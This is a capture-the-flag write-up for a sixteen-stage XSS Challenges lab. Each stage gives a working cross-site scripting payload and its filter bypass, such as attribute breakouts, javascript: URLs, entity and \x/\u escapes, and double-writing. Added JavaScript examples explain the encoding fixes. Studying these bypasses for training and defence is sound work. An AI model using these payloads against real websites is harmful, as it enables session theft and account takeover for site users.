XSS Challenges

Stage #1

payload:

<script>alert(document.domain);</script>

Stage #2

payload:

"><script>alert(document.domain);</script>

Stage #3

Capture the request with Burp and put the payload in p2

payload:

</option><script>alert(document.domain)</script>

Stage #4

Capture the request with Burp and put the payload in p3

payload:

"><svg onload=alert(document.domain)>

Stage #5

Change the maxlength="15" attribute on p1

payload:

"><script>alert(document.domain);</script>

Stage #6

Entering < and > gets them replaced with &lt; and &gt;

payload:

"onmouseover="alert(document.domain);
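Added example, not code from the original write-up: Stage #6 entity-encodes only the angle brackets before placing the input in a quoted attribute value, so a double quote in the input still closes the value early. The template, the "angle-brackets-only" filter and the tiny attribute tokenizer below are assumptions about what the stage does, written to show why attribute-context encoding (quotes included) is the fix.

```javascript
// Stage #6's own payload, used here as the sample input.
const STAGE6_INPUT = '"onmouseover="alert(document.domain);';

// Assumed shape of the stage's filter: only angle brackets are encoded.
function encodeAngleBracketsOnly(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Attribute-context encoding: every character that can end a quoted value
// or start an entity is encoded, so the value cannot grow a second attribute.
function encodeForHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Renders the input the way the stage's page is assumed to.
function renderInput(userValue, encode) {
  return `<input type="text" name="p1" value="${encode(userValue)}">`;
}

// Lists the attribute names a parser would see on one tag. Deliberately
// small: handles double-quoted and unquoted values, enough to reveal an
// attribute the template never had.
function attributeNames(tagHtml) {
  const names = [];
  const re = /([A-Za-z-]+)=("[^"]*"|[^\s>]*)/g;
  let m;
  while ((m = re.exec(tagHtml)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when an on* event-handler attribute appeared on the rendered tag.
function hasInjectedHandler(tagHtml) {
  return attributeNames(tagHtml).some((n) => n.startsWith('on'));
}

console.log(attributeNames(renderInput(STAGE6_INPUT, encodeAngleBracketsOnly)));
// -> [ 'type', 'name', 'value', 'onmouseover' ]
console.log(attributeNames(renderInput(STAGE6_INPUT, encodeForHtmlAttribute)));
// -> [ 'type', 'name', 'value' ]
```

The check is only a toy tokenizer, but the two outputs are the whole point: with angle-bracket encoding the rendered tag carries a fourth attribute, with full attribute encoding the input stays one inert value.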

Stage #7

Use a space in the input to get past the filter

payload:

qwe onmouseover=alert(document.domain);

Stage #8

Execute script via the javascript: pseudo-protocol

payload:

javascript:alert(document.domain)

Stage #9

UTF-7 encoding (rarely used these days): use an old version of IE and enter the input on the front end to bypass the filter

payload:

"onmouseover="alert(document.domain)

Stage #10

Double-write bypass

payload:

"><script>alert(document.domdomainain);</script>
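Added example, not code from the original write-up: the double-write trick works because the stage's filter is assumed to delete the word "domain" in a single pass, so the deletion is not idempotent. The functions below show that property and the usual patch (repeat until stable, with a cap); the names and the filter shape are assumptions.

```javascript
// The trick from the payload above: one "domain" wrapped around another.
const STAGE10_WORD = 'domdomainain';

// Assumed shape of the stage's filter: one pass of global deletion.
function stripOnce(s, word = 'domain') {
  return s.split(word).join('');
}

// A sanitizer that changes its own output on a second run is not finished:
// whatever it removed can be reassembled from the pieces it left behind.
function isIdempotent(filter, input) {
  const once = filter(input);
  return filter(once) === once;
}

// Repeats the deletion until the text stops changing. The cap stops crafted
// input from looping; hitting it returns null so the caller rejects the input
// instead of passing through a half-filtered value. This closes the
// double-write trick but is still a deny-list of one word.
function stripUntilStable(s, word = 'domain', maxRounds = 20) {
  let prev = s;
  for (let i = 0; i < maxRounds; i++) {
    const next = stripOnce(prev, word);
    if (next === prev) return next;
    prev = next;
  }
  return null;
}

console.log(stripOnce(STAGE10_WORD));               // -> 'domain'
console.log(isIdempotent(stripOnce, STAGE10_WORD)); // -> false
console.log(stripUntilStable(STAGE10_WORD));        // -> ''
```

The durable fix is not a longer deny-list: encoding the output for the attribute it lands in (so `"` and `<` cannot take effect) makes the word list irrelevant, and the idempotence check is a cheap unit test to keep on any filter that deletes substrings.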

Stage #11

JavaScript keywords and event-handler names are filtered; consider the <a> tag instead

payload:

"><a href="java&#115;cript:alert(document.domain);">1</a>
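Added example, not code from the original write-up, covering Stages #8 and #11 together: both land the input in an href, where a javascript: URL runs on click, and Stage #11 shows that entity-encoding one letter of the scheme gets past a check that looks at the raw text. The validator below is an assumed defensive check: decode numeric character references the way the HTML parser would, then let a URL parser decide the scheme against an allow-list. The allow-list and the placeholder base URL are assumptions.

```javascript
// Schemes a link value may resolve to; everything else is rejected.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Decodes &#NNN; and &#xHH; numeric character references. The HTML parser
// performs this decoding before the browser ever resolves the URL, so a
// validator that skips it is checking a different string than the browser.
function decodeNumericEntities(s) {
  return s.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);/g, (_, num) => {
    const code = /^[xX]/.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// True only when the link resolves to an allowed scheme. Relative URLs are
// resolved against a placeholder base (assumption: the site is served over
// HTTPS). The WHATWG parser also strips the tabs/newlines and lowercases the
// scheme, so "java\tscript:" and "JavaScript:" are judged the same way.
function isAllowedHref(rawHref) {
  const decoded = decodeNumericEntities(String(rawHref));
  let url;
  try {
    url = new URL(decoded, 'https://placeholder.invalid/');
  } catch (e) {
    return false; // unparseable: reject rather than guess
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

console.log(isAllowedHref('https://example.com/page'));            // -> true
console.log(isAllowedHref('/local/path'));                         // -> true
console.log(isAllowedHref('javascript:alert(document.domain)'));   // -> false
console.log(isAllowedHref('java&#115;cript:alert(document.domain);')); // -> false
```

Run the check before rendering and still attribute-encode the value on output; the two steps answer different questions (is this a link we want, and can it break out of the attribute), and neither replaces the other.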

Stage #12

Exploit the IE browser's handling of backticks (``) to get past the filter

payload:

``onmouseover=alert(document.domain);

Stage #13

Trigger the XSS via a feature of older IE versions

payload:

background-color:#ffff;background:url("javascript:alert(document.domain);");

Stage #14

Trigger the XSS via a feature of older IE versions

payload:

xss:ex/**/pression(if(!window.x){alert(document.domain);window.x=1})

Stage #15

Bypass the filter with hex or Unicode escapes

payload:

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

Stage #16

Bypass the filter with Unicode escapes

payload:

\u003cscript\u003ealert(document.domain);\u003c/script\u003e
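Added example, not code from the original write-up, covering Stages #15 and #16 together: the input is placed inside a JavaScript string literal that the page then writes into the document (an assumption about the stage's sink). The filter entity-encodes angle brackets in the raw text but leaves the backslash alone, so `\x3c` and `\u003c` reach the JS parser, which turns them back into `<` when it builds the string value. The small literal decoder below simulates that step; the layered encoder is the assumed fix (HTML-encode for the final sink, then JS-string-encode for the literal).

```javascript
// The two stage payloads, as the server receives them (literal backslashes).
const STAGE15_INPUT = '\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e';
const STAGE16_INPUT = '\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e';

// Assumed shape of the stage's filter: only angle brackets are encoded.
function encodeAngleBracketsOnly(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Layered encoding for "HTML written from a JS string": HTML-encode first
// (for document.write), then JS-string-encode (for the literal). JSON.stringify
// escapes '\' and '"'; the extra pass turns '<', '>', '&' and the U+2028/9
// line terminators into \uXXXX so the script source never contains them.
function encodeHtmlThenJsString(s) {
  const html = s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#x27;');
  return JSON.stringify(html).slice(1, -1)
    .replace(/[<>&\u2028\u2029]/g, (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Simulates how the JS parser decodes the body of a double-quoted string
// literal: \xHH, \uHHHH and single-character escapes such as \\ and \".
// Assumption: those forms are enough for this example (no \u{...}).
function decodeJsStringLiteral(body) {
  let out = '';
  for (let i = 0; i < body.length; i++) {
    if (body[i] !== '\\') { out += body[i]; continue; }
    const next = body[i + 1];
    if (next === undefined) break;
    if (next === 'x') { out += String.fromCharCode(parseInt(body.slice(i + 2, i + 4), 16)); i += 3; }
    else if (next === 'u') { out += String.fromCharCode(parseInt(body.slice(i + 2, i + 6), 16)); i += 5; }
    else { out += next; i += 1; }
  }
  return out;
}

// The text document.write would receive after the literal is parsed.
function valueWrittenToDocument(userInput, encode) {
  return decodeJsStringLiteral(encode(userInput));
}

// True when that text contains something the HTML parser would treat as a tag.
function containsTag(text) {
  return /<\/?[a-z]/i.test(text);
}

console.log(valueWrittenToDocument(STAGE15_INPUT, encodeAngleBracketsOnly));
// -> <script>alert(document.domain);</script>
console.log(valueWrittenToDocument(STAGE15_INPUT, encodeHtmlThenJsString));
// -> \x3cscript\x3ealert(document.domain);\x3c/script\x3e
```

The decoder is only a model of one parsing step, but it makes the failure concrete: the angle-bracket filter never sees a `<` because the browser creates it later, while the layered encoder doubles the backslash so the escape sequence stays text. Encoding for the last sink first, then for each enclosing context outward, is the general rule this stage illustrates.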

Original article: https://www.cnblogs.com/f1veseven/p/13290393.html